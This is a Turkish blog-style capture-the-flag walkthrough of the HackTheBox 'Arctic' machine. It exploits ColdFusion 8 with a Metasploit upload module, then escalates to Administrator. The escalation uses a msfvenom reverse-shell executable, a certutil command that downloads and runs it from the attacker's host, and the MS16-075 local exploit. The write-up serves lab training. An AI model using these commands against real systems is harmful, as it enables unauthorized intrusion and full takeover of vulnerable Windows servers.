Bu yazımda Hackthebox Arctic Çözümü sizler için paylaşacağım.
- Makine İsmi: Arctic
- Makine Zorluğu: Başlangıç-Orta
- Makine Oda Linki: https://app.hackthebox.com/machines/Arctic
1- İlk olarak nmap taraması yaparak başlıyorum.
Baktığımızda 3 port açık olduğunu gördüm. Sıra sıra inceledim ve işimize yarayacak 1 port tespit ettim.
8500 porta tarayıcı üzerinden erişim sağlamaya çalışıyorum.
2- http://10.10.10.11:8500/CFIDE/administrator/ adresine gittiğimizde login sayfası karşılıyor.
Coldfusıon 8 için exploit aramaya başlıyorum. Exploit ile makine içerisine sızabiliriz.
3- Metasploit üzerinden arama yapıyorum. msfconsole yazarak metasploit çalıştırabilirsiniz.
Araştırmaya başladığımda Coldfusion upload zafiyeti için yazılmış bir exploit keşfettim.
2009’da keşfedilmiş ve denendiği için bu exploit ile makineye sızabileceğimizi düşünüyorum.
4- Sıra sıra aşağıdaki komutları yazarak exploit ayarlarını yapalım ve çalıştıralım.
- use exploit/windows/http/coldfusion_fckeditor
- set RHOSTS 10.10.10.11
- set RPORT 8500
- set LHOST Vpn ip adresiniz
- set HTTPCLIENTTIMEOUT 150
- run
Yazdığımızda direkt olarak sisteme girmiş oluyoruz.
5- Shell yazdığımızda direk içerisine girmiş oluyoruz.
type \Users\tolis\Desktop\user.txt komutu ile direkt user.txt olarak ilk bayrağımızı buluyoruz.
İlginizi çekebilecek yazımız: Web Güvenliğinde Bilinmesi Gerekenler: XSS Açığı ve Önleme Yöntemleri
6- Detaylı olarak sistemi görmek için inceliyorum.
Windows 2008 olduğunu keşfettim. Baya eski bir işletim sistemi var buradan devam ederek uygun exploit arayarak yetki yükseltmeye çalışacağım.
Rahatlıkla yetki yükseltebileceğimizi keşfediyorum.
7- Yeni bir terminal açıp sırasıyla msfvenom üzerinden .exe olarak shell oluşturuyoruz.
- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -a x64 -f exe > siberguvenlik.exe
- python3 -m http.server 80
8- Terminal üzerinden sıfırdan msfconsole yazarak 2. bir metasploit ayarlıyoruz. Önceki maddelerde sızdığımız metasploit açık kalsın bunu yan terminalden açabilirsiniz.
Sırasıyla;
- use exploit/multi/handler
- set PAYLOAD windows/x64/meterpreter/reverse_tcp
- set LHOST vpn ip adresiniz
- set LPORT 9001
- run
Diğer metasploit içerisine geçiş yapıyoruz.
9- Sırasıyla;
- cd \Windows\Tasks\
- certutil.exe -urlcache -split -f “http://10.10.16.3/siberguvenlik.exe” siberguvenlik.exe
- siberguvenlik.exe
Çalıştığı anda direkt olarak diğer metasploit içerisine ayarladığımız yere bağlantı gidecektir.
10- Evet bağlantı gelmiş. Şimdi buradan yetki yükseltmek için exploit arayacağım.
run multi/recon/local_exploit_suggester yazarak yetki yükseltmek için exploitleri bulmasını istiyorum.
11- Çok fazla exploit çıktı çoğunu denedim ve çalışmadı.
ms16_075 olan exploit ile direkt olarak administrator içerisine geçiş yapabiliriz.
12- Sırasıyla;
- background
- use exploit/windows/local/ms16_075_reflection_juicy
- set LHOST vpn ip adresiniz
- set SESSION 1
- run
Evet kendi yetki yükseltmek için exploiti çalıştırdı ve direkt olarak administrator içerisine geçiş yaptık.
13- shell yazdık ve direkt administrator olarak içerisindeyiz.
type C:\Users\Administrator\Desktop\root.txt yazarak son bayrağı da bulabilirsiniz.
Hackthebox Arctic Çözümü yazımızın sonuna geldik. Yeni yazılarda görüşmek üzere..